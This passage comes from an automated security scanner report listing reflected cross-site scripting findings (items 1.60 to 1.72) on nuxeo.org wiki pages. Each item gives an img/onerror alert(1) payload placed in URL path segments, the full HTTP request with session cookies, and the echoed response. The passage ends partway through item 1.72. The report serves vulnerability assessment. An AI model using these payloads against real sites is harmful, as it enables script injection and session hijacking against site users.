1.60. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b6e"><img%20src%3da%20onerror%3dalert(1)>7640e37c755 was submitted in the REST URL parameter 4. This input was echoed as e8b6e"><img src=a onerror=alert(1)>7640e37c755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maine8b6e"><img%20src%3da%20onerror%3dalert(1)>7640e37c755/BookEPMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:28 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maine8b6e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7640e37c755/BookEPMoved?format=xar&amp;name=Maine8b6e"><img src=a onerror=alert(1)>7640e37c755.BookEPMoved&amp;pages=Maine8b6e">
...[SNIP]...

1.61. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94b55<img%20src%3da%20onerror%3dalert(1)>bdb277e3df2 was submitted in the REST URL parameter 4. This input was echoed as 94b55<img src=a onerror=alert(1)>bdb277e3df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main94b55<img%20src%3da%20onerror%3dalert(1)>bdb277e3df2/BookEPMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12923
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main94b55%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebdb277e3df2/">Main94b55<img src=a onerror=alert(1)>bdb277e3df2</a>
...[SNIP]...

1.62. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a5c7c<img%20src%3da%20onerror%3dalert(1)>66b831a0a72 was submitted in the REST URL parameter 5. This input was echoed as a5c7c<img src=a onerror=alert(1)>66b831a0a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookEPMoveda5c7c<img%20src%3da%20onerror%3dalert(1)>66b831a0a72 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12911
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoveda5c7c%3Cimg+src%3Da+onerror%3Dalert%281%29%3E66b831a0a72'>BookEPMoveda5c7c<img src=a onerror=alert(1)>66b831a0a72</a>
...[SNIP]...

1.63. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53fbe"><img%20src%3da%20onerror%3dalert(1)>e2db809e87b was submitted in the REST URL parameter 5. This input was echoed as 53fbe"><img src=a onerror=alert(1)>e2db809e87b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookEPMoved53fbe"><img%20src%3da%20onerror%3dalert(1)>e2db809e87b HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12973
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BookEPMoved53fbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee2db809e87b?format=xar&amp;name=Main.BookEPMoved53fbe"><img src=a onerror=alert(1)>e2db809e87b&amp;pages=Main.BookEPMoved53fbe">
...[SNIP]...

1.64. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ac20<img%20src%3da%20onerror%3dalert(1)>34b3d0cb59f was submitted in the REST URL parameter 4. This input was echoed as 9ac20<img src=a onerror=alert(1)>34b3d0cb59f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main9ac20<img%20src%3da%20onerror%3dalert(1)>34b3d0cb59f/CMIS HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:51 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12832
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main9ac20%3Cimg+src%3Da+onerror%3Dalert%281%29%3E34b3d0cb59f/">Main9ac20<img src=a onerror=alert(1)>34b3d0cb59f</a>
...[SNIP]...

1.65. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d639"><img%20src%3da%20onerror%3dalert(1)>4b8cf8e51bb was submitted in the REST URL parameter 4. This input was echoed as 6d639"><img src=a onerror=alert(1)>4b8cf8e51bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6d639"><img%20src%3da%20onerror%3dalert(1)>4b8cf8e51bb/CMIS HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main6d639%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4b8cf8e51bb/CMIS?format=xar&amp;name=Main6d639"><img src=a onerror=alert(1)>4b8cf8e51bb.CMIS&amp;pages=Main6d639">
...[SNIP]...

1.66. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ef7"><img%20src%3da%20onerror%3dalert(1)>13a548dc1df was submitted in the REST URL parameter 5. This input was echoed as 38ef7"><img src=a onerror=alert(1)>13a548dc1df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/CMIS38ef7"><img%20src%3da%20onerror%3dalert(1)>13a548dc1df HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:29 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12882
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/CMIS38ef7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E13a548dc1df?format=xar&amp;name=Main.CMIS38ef7"><img src=a onerror=alert(1)>13a548dc1df&amp;pages=Main.CMIS38ef7">
...[SNIP]...

1.67. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 95275<img%20src%3da%20onerror%3dalert(1)>692dc4b9251 was submitted in the REST URL parameter 5. This input was echoed as 95275<img src=a onerror=alert(1)>692dc4b9251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/CMIS95275<img%20src%3da%20onerror%3dalert(1)>692dc4b9251 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12820
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/CMIS95275%3Cimg+src%3Da+onerror%3Dalert%281%29%3E692dc4b9251'>CMIS95275<img src=a onerror=alert(1)>692dc4b9251</a>
...[SNIP]...

1.68. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ae2d<img%20src%3da%20onerror%3dalert(1)>460174238d1 was submitted in the REST URL parameter 4. This input was echoed as 2ae2d<img src=a onerror=alert(1)>460174238d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main2ae2d<img%20src%3da%20onerror%3dalert(1)>460174238d1/ContributionSpace HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13001
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main2ae2d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E460174238d1/">Main2ae2d<img src=a onerror=alert(1)>460174238d1</a>
...[SNIP]...

1.69. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434b1"><img%20src%3da%20onerror%3dalert(1)>a501731b55d was submitted in the REST URL parameter 4. This input was echoed as 434b1"><img src=a onerror=alert(1)>a501731b55d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main434b1"><img%20src%3da%20onerror%3dalert(1)>a501731b55d/ContributionSpace HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13067
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main434b1%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea501731b55d/ContributionSpace?format=xar&amp;name=Main434b1"><img src=a onerror=alert(1)>a501731b55d.ContributionSpace&amp;pages=Main434b1">
...[SNIP]...

1.70. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6af3"><img%20src%3da%20onerror%3dalert(1)>761b200ad62 was submitted in the REST URL parameter 5. This input was echoed as f6af3"><img src=a onerror=alert(1)>761b200ad62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/ContributionSpacef6af3"><img%20src%3da%20onerror%3dalert(1)>761b200ad62 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13051
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/ContributionSpacef6af3%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E761b200ad62?format=xar&amp;name=Main.ContributionSpacef6af3"><img src=a onerror=alert(1)>761b200ad62&amp;pages=Main.ContributionSpacef6af3">
...[SNIP]...

1.71. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 61c31<img%20src%3da%20onerror%3dalert(1)>d24e0bc59b3 was submitted in the REST URL parameter 5. This input was echoed as 61c31<img src=a onerror=alert(1)>d24e0bc59b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/ContributionSpace61c31<img%20src%3da%20onerror%3dalert(1)>d24e0bc59b3 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace61c31%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed24e0bc59b3'>ContributionSpace61c31<img src=a onerror=alert(1)>d24e0bc59b3</a>
...[SNIP]...

1.72. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Dashboard

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f93c1<img%20src%3da%20onerror%3dalert(1)>4d9be4736ed was submitted in the REST URL parameter 4. This input was echoed as f93c1<img src=a onerror=alert(1)>4d9be4736ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf93c1<img%20src%3da%20onerror%3dalert(1)>4d9be4736ed/Dashboard HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12897
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

